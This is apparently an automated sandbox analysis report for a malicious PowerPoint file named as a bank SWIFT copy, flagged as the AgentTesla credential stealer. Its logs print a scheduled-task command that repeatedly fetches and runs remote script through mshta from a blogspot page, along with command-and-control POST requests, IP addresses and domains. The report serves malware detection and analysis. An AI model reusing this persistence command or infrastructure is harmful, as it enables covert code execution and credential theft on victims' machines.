Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')			Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: Yara match	File source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE

Yara detected Credential Stealer

Source: Yara match

File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: Yara match	File source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
108.177.127.132	unknown	United States	15169	GOOGLEUS	false
172.67.219.133	unknown	United States	13335	CLOUDFLARENETUS	false
67.199.248.16	unknown	United States	396982	GOOGLE-PRIVATE-CLOUDUS	true
104.18.49.20	unknown	United States	13335	CLOUDFLARENETUS	false
64.188.18.218	unknown	United States	8100	ASN-QUADRANET-GLOBALUS	false

Contacted Domains

Name	IP	Active
paste.ee	104.18.49.20	true
blogspot.l.googleusercontent.com	108.177.127.132	true
j.mp	67.199.248.16	true
ghostbackbone123.blogspot.com	unknown	unknown
startthepartyup.blogspot.com	unknown	unknown
backbones1234511a.blogspot.com	unknown	unknown
mainjigijigi123.blogspot.com	unknown	unknown
randikhanaekminar.blogspot.com	unknown	unknown
www.blogger.com	unknown	unknown
resources.blogblog.com	unknown	unknown

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: BankSwiftCopyUSD95000.ppt

Avira: detected

Multi AV Scanner detection for submitted file

Source: BankSwiftCopyUSD95000.ppt	Virustotal: Detection: 34%			Perma Link
Source: BankSwiftCopyUSD95000.ppt	ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: BankSwiftCopyUSD95000.ppt

Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2

Source:	Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Process created: C:\Windows\System32\PING.EXE

Jump to behavior

Allocates a big amount of memory (probably used for heap spraying)

Source: powerpnt.exe

Memory has grown: Private usage: 0MB later: 10MB

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: j.mp

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 108.177.127.132:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:80

Networking:

Connects to a URL shortener service

Source: unknown

DNS query: name: j.mp

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee

Uses ping.exe to check the status of other devices and networks

Source: unknown

Process created: C:\Windows\System32\PING.EXE ping.exe

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.219.133 172.67.219.133
Source: Joe Sandbox View	IP Address: 172.67.219.133 172.67.219.133
Source: Joe Sandbox View	IP Address: 67.199.248.16 67.199.248.16
Source: Joe Sandbox View	IP Address: 67.199.248.16 67.199.248.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: global traffic

Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comt\ equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: Content-Security-Policy: script-src 'self' .google.com .google-analytics.com 'unsafe-inline' 'unsafe-eval' .gstatic.com .googlesyndication.com .blogger.com .googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
